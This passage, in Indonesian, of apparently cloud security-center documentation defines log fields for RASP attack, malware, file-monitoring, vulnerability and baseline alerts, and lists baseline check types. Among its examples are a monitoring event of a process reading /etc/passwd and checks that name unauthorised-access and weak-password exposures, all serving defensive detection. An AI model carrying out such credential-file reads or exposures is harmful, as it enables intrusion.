stacktrace | Informasi stack. | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | Waktu ketika alert dipicu. | 2023-10-09 15:19:15 |
timestamp | Timestamp ketika alert dipicu, dalam milidetik. | 1696835955070 |
type | Tipe serangan. Nilai valid:
| rce |
url | URL permintaan. | http://127.0.0.1:999/xxx |
rasp_attack_uuid | UUID event serangan. | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | UUID host. | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | Alamat IP publik host. | 1.2.XX.XX |
intranet_ip | Alamat IP pribadi host. | 172.16.XX.XX |
sas_group_name | Nama grup server di Pusat Keamanan. | Group 1 |
instance_id | ID instans host. | i-wz995eivg28f1m** |
start_time | Timestamp mulai, dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
Malware detection logs
Nama Bidang | Deskripsi | Contoh |
bucket_name | Nama bucket. | ***-test |
event_id | ID alert. | 802210 |
event_name | Nama alert. | Program Penambangan |
md5 | Hash MD5 file. | 6bc2bc******53d409b1 |
sha256 | Hash SHA256 file. | f038f9525******7772981e87f85 |
result | Hasil deteksi. Nilai valid:
| 0 |
file_path | Path file. | test.zip/bin_test |
etag | Pengenal file OSS. | 6BC2B******853D409B1 |
risk_level | Level risiko. Nilai valid:
| remind |
source | Skema deteksi. Nilai valid:
| OSS |
parent_md5 | Hash MD5 file kelas induk atau paket terkompresi. | 3d0f8045bb9****** |
parent_sha256 | Hash SHA256 file induk atau paket terkompresi. | 69b643d6******a3fb859fa |
parent_file_path | Nama file induk atau paket terkompresi. | test.zip |
start_time | Timestamp mulai, dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
compress_file_number | Nomor urut file paket terkompresi, dalam format | 1/10: Arsip berisi 10 file. Ini adalah file ke-1. |
Core file monitoring event logs
Nama Field | Deskripsi | Contoh |
start_time | Waktu paling baru event terjadi. Satuan: detik. | 1718678414 |
uuid | UUID agen. | 5d83b26b-b**a-4**a-9267-12**** |
file_path | Path file. | /etc/passwd |
proc_path | Path proses. | /usr/bin/bash |
rule_id | ID aturan yang terkena. | 123 |
rule_name | Nama aturan. | file_test_rule |
cmdline | Command line. | bash /opt/a |
operation | Operasi pada file. | READ |
risk_level | Level alert. | 2 |
pid | ID proses. | 45324 |
proc_permission | Izin proses. | rwxrwxrwx |
instance_id | ID instans. | i-wz995eivg2**** |
internet_ip | Alamat IP publik. | 192.0.2.1 |
intranet_ip | Alamat IP pribadi. | 172.16.0.1 |
instance_name | Nama instans. | aegis-test |
platform | Tipe sistem operasi. | Linux |
Agentless detection logs
Field umum untuk kerentanan, baseline, dan sampel berbahaya
Nama field | Deskripsi | Contoh |
uuid | UUID server. | ad66133a-dc82-4e5e-9659-a49e3**** |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi aset. | 192.168.XX.XX |
sas_group_name | Grup aset server di Pusat Keamanan. | default |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
Field risiko kerentanan
Nama Bidang | Deskripsi | Contoh |
vul_name | Nama kerentanan. | imgsca:java:gson:AVD-2022-25647 |
vul_alias_name | Alias kerentanan. | kerentanan isu kode gson (CVE-2022-25647) |
vul_primary_id | ID kunci utama kerentanan. | 990174361 |
type | Tipe kerentanan. Nilai valid:
| sca |
alert_level | Level risiko kerentanan. Nilai valid:
| asap |
instance_name | Hostname. | hhht-linux-*** |
operation | Tindakan yang dilakukan pada kerentanan. Nilai valid:
| new |
status | Informasi status kerentanan. Nilai valid:
| 1 |
tag | Tag kerentanan. Nilai valid:
Catatan Tag untuk tipe kerentanan lainnya adalah string acak. | oval |
Field pemeriksaan baseline
Nama field | Deskripsi | Contoh |
check_item_name | Nama item pemeriksaan. | Setel waktu kedaluwarsa kata sandi |
check_item_level | Level risiko item pemeriksaan. Nilai valid:
| high |
check_type | Tipe item pemeriksaan. | Otentikasi identitas |
risk_level | Level risiko item risiko. Nilai valid:
| low |
operation | Operasi. Nilai valid:
| new |
risk_name | Nama item pemeriksaan berisiko. | Pemeriksaan kepatuhan kebijakan kata sandi |
status | Status item pemeriksaan. Nilai valid:
| 1 |
sub_type_alias_name | Alias subtipe. | Standar Alibaba Cloud - Pemeriksaan baseline keamanan CentOS Linux 7/8 |
sub_type_name | Nama subtipe baseline. Untuk informasi lebih lanjut tentang nilai valid subtipe baseline, lihat Daftar tipe dan subtipe baseline. | hc_centos7 |
type_name | Nama tipe. | hc_best_secruity |
type_alias_name | Alias tipe. | Praktik terbaik |
container_id | ID kontainer. | b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
container_name | Nama kontainer. | k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
Field sampel berbahaya
Nama field | Deskripsi | Contoh |
alert_level | Level risiko event alert. Nilai valid:
| suspicious |
alert_name | Nama alert sampel berbahaya. | Proses Mencurigakan - Berbasis SSH |
operation | Operasi. Nilai valid:
| new |
status | Status risiko sampel berbahaya. Nilai valid:
| 0 |
suspicious_event_id | ID event peringatan. | 909361 |
Field file sensitif
Nama field | Deskripsi | Contoh |
alert_level | Level risiko. Nilai valid:
| high |
rule_name | Nama tipe file. | Token Ionic |
file_path | Path file sensitif. | /Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
result | Hasil pemeriksaan. | {"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
Lampiran
Daftar tipe dan subtipe baseline
Nama tipe | Nama subtipe | Deskripsi |
hc_exploit | hc_exploit_redis | Eksploitasi ancaman penting: Akses tidak sah ke Redis |
hc_exploit_activemq | Eksploitasi ancaman penting: Akses tidak sah ke ActiveMQ | |
hc_exploit_couchdb | Eksploitasi ancaman penting: Akses tidak sah ke CouchDB | |
hc_exploit_docker | Eksploitasi ancaman penting: Akses tidak sah ke Docker | |
hc_exploit_es | Eksploitasi ancaman penting: Akses tidak sah ke Elasticsearch | |
hc_exploit_hadoop | Eksploitasi ancaman penting: Akses tidak sah ke Hadoop | |
hc_exploit_jboss | Eksploitasi ancaman penting: Akses tidak sah ke JBoss | |
hc_exploit_jenkins | Eksploitasi ancaman penting: Akses tidak sah ke Jenkins | |
hc_exploit_k8s_api | Eksploitasi ancaman penting: Akses tidak sah ke server API Kubernetes | |
hc_exploit_ldap | Eksploitasi ancaman penting: Akses tidak sah ke LDAP (lingkungan Windows) | |
hc_exploit_ldap_linux | Eksploitasi ancaman penting: Akses tidak sah ke OpenLDAP (lingkungan Linux) | |
hc_exploit_memcache | Eksploitasi ancaman penting: Akses tidak sah ke Memcached | |
hc_exploit_mongo | Eksploitasi ancaman penting: Akses tidak sah ke MongoDB | |
hc_exploit_pgsql | Penting: Eksploitasi Ancaman—Baseline Akses Tidak Sah PostgreSQL | |
hc_exploit_rabbitmq | Eksploitasi ancaman penting: Akses tidak sah ke RabbitMQ | |
hc_exploit_rsync | Eksploitasi ancaman penting: Akses tidak sah ke rsync | |
hc_exploit_tomcat | Eksploitasi ancaman penting: Kerentanan inklusi file Apache Tomcat AJP | |
hc_exploit_zookeeper | Eksploitasi ancaman penting: Akses tidak sah ke ZooKeeper | |
hc_container | hc_docker | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Docker |
hc_middleware_ack_master | Praktik terbaik keamanan internasional: Pemeriksaan baseline keamanan node master Kubernetes (ACK) | |
hc_middleware_ack_node | Praktik terbaik keamanan internasional: Pemeriksaan baseline keamanan node Kubernetes (ACK) | |
hc_middleware_k8s | Standar Alibaba Cloud: Pemeriksaan baseline keamanan node master Kubernetes | |
hc_middleware_k8s_node | Standar Alibaba Cloud: Pemeriksaan baseline keamanan node Kubernetes | |
cis | hc_suse 15_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan SUSE 15 |
hc_aliyun_linux3_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Alibaba Cloud Linux 3 | |
hc_aliyun_linux_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Alibaba Cloud Linux/Aliyun Linux 2 | |
hc_bind_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Bind | |
hc_centos 6_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan CentOS Linux 6 | |
hc_centos 7_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan CentOS Linux 7 | |
hc_centos 8_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan CentOS Linux 8 | |
hc_debian_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Debian Linux 8/9/10 | |
hc_iis_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan IIS | |
hc_informix_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Informix | |
hc_jboss_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan JBoss | |
hc_mongo_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan MongoDB | |
hc_mssql_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan SQL Server | |
hc_mysql_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan MySQL | |
hc_nginx_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Nginx | |
hc_oracle_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Oracle | |
hc_pgsql_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan PostgreSQL | |
hc_redhat 6_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Red Hat Linux 6 | |
hc_redhat_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Red Hat Linux 7 | |
hc_redis_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Redis | |
hc_suse 10_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan SUSE 10 | |
hc_suse 12_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan SUSE 12 | |
hc_suse_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan SUSE 11 | |
hc_ubuntu 14_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Ubuntu 14 | |
hc_ubuntu_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Ubuntu 16/18/20 | |
hc_was_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Websphere Application Server | |
hc_weblogic_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan WebLogic | |
hc_win 2008_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Windows 2008 R2 | |
hc_win 2012_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Windows 2012 R2 | |
hc_win 2016_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Windows 2016/2019 | |
hc_aliyun_linux_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Alibaba Cloud Linux/Aliyun Linux 2 | |
hc_centos 6_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan CentOS Linux 6 | |
hc_centos 7_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan CentOS Linux 7 | |
hc_debian_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Debian Linux 8 | |
hc_redhat 7_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Red Hat Linux 7 | |
hc_ubuntu_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Ubuntu 16/18 | |
hc_win 2008_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Windows 2008 R2 | |
hc_win 2012_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Windows 2012 R2 | |
hc_win 2016_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Windows 2016/2019 | |
hc_aliyun_linux_cis | Praktik terbaik keamanan internasional: Pemeriksaan baseline keamanan Alibaba Cloud Linux/Aliyun Linux 2 | |
hc_centos 6_cis_rules | Praktik terbaik keamanan internasional: Pemeriksaan baseline keamanan CentOS Linux 6 | |
hc_centos 7_cis_rules | Praktik terbaik keamanan internasional: Pemeriksaan baseline keamanan CentOS Linux 7 | |
hc_centos 8_cis_rules | Praktik terbaik keamanan internasional: Pemeriksaan baseline keamanan CentOS Linux 8 | |
hc_debian 8_cis_rules | Praktik terbaik keamanan internasional: Pemeriksaan baseline keamanan Debian Linux 8 | |
hc_ubuntu 14_cis_rules | Praktik terbaik keamanan internasional: Pemeriksaan baseline keamanan Ubuntu 14 | |
hc_ubuntu 16_cis_rules | Praktik terbaik keamanan internasional: Pemeriksaan baseline keamanan Ubuntu 16/18/20 | |
hc_win 2008_cis_rules | Praktik terbaik keamanan internasional: Pemeriksaan baseline keamanan Windows Server 2008 R2 | |
hc_win 2012_cis_rules | Praktik terbaik keamanan internasional: Pemeriksaan baseline keamanan Windows Server 2012 R2 | |
hc_win 2016_cis_rules | Praktik terbaik keamanan internasional: Pemeriksaan baseline keamanan Windows Server 2016/2019 R2 | |
hc_kylin_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Kylin | |
hc_uos_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan UOS | |
hc_best_security | hc_aliyun_linux | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Alibaba Cloud Linux/Aliyun Linux 2 |
hc_centos 6 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan CentOS Linux 6 | |
hc_centos 7 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan CentOS Linux 7/8 | |
hc_debian | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Debian Linux 8/9/10 | |
hc_redhat 6 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Red Hat Linux 6 | |
hc_redhat 7 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Red Hat Linux 7/8 | |
hc_ubuntu | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Ubuntu | |
hc_windows_2008 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Windows 2008 R2 | |
hc_windows_2012 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Windows 2012 R2 | |
hc_windows_2016 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Windows 2016/2019 | |
hc_db_mssql | Standar Alibaba Cloud: Pemeriksaan baseline keamanan SQL Server | |
hc_memcached_ali | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Memcached | |
hc_mongodb | Standar Alibaba Cloud: Pemeriksaan baseline keamanan MongoDB 3.x | |
hc_mysql_ali | Standar Alibaba Cloud: Pemeriksaan baseline keamanan MySQL | |
hc_oracle | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Oracle 11g | |
hc_pgsql_ali | Standar Alibaba Cloud: Pemeriksaan baseline keamanan PostgreSQL | |
hc_redis_ali | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Redis | |
hc_apache | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Apache | |
hc_iis_8 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan IIS 8 | |
hc_nginx_linux | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Nginx | |
hc_suse 15 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan SUSE Linux 15 | |
tomcat 7 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Apache Tomcat | |
weak_password | hc_mongodb_pwd | Kata sandi lemah: Deteksi kata sandi lemah login MongoDB (mendukung versi 2.x) |
hc_weakpwd_ftp_linux | Kata sandi lemah: Pemeriksaan kata sandi lemah login FTP | |
hc_weakpwd_linux_sys | Kata sandi lemah: Pemeriksaan kata sandi lemah login sistem Linux | |
hc_weakpwd_mongodb 3 | Kata sandi lemah: Deteksi kata sandi lemah login MongoDB | |
hc_weakpwd_mssql | Kata sandi lemah: Pemeriksaan kata sandi lemah login database SQL Server | |
hc_weakpwd_mysql_linux | Kata sandi lemah: Pemeriksaan kata sandi lemah login database MySQL | |
hc_weakpwd_mysql_win | Kata sandi lemah: Pemeriksaan kata sandi lemah login database MySQL (Windows) | |
hc_weakpwd_openldap | Kata sandi lemah: Pemeriksaan kata sandi lemah login OpenLDAP | |
hc_weakpwd_oracle | Kata sandi lemah: Deteksi kata sandi lemah login Oracle | |
hc_weakpwd_pgsql | Kata sandi lemah: Pemeriksaan kata sandi lemah login database PostgreSQL | |
hc_weakpwd_pptp | Kata sandi lemah: Pemeriksaan kata sandi lemah layanan pptpd | |
hc_weakpwd_redis_linux | Kata sandi lemah: Pemeriksaan kata sandi lemah login database Redis | |
hc_weakpwd_rsync | Kata sandi lemah: Pemeriksaan kata sandi lemah layanan rsync | |
hc_weakpwd_svn | Kata sandi lemah: Pemeriksaan kata sandi lemah layanan SVN | |
hc_weakpwd_tomcat_linux | Kata sandi lemah: Pemeriksaan kata sandi lemah konsol Apache Tomcat | |
hc_weakpwd_vnc | Kata sandi lemah: Pemeriksaan kata sandi lemah VNC Server | |
hc_weakpwd_weblogic | Kata sandi lemah: Deteksi kata sandi lemah login WebLogic 12c | |
hc_weakpwd_win_sys | Kata sandi lemah: Pemeriksaan kata sandi lemah login sistem Windows |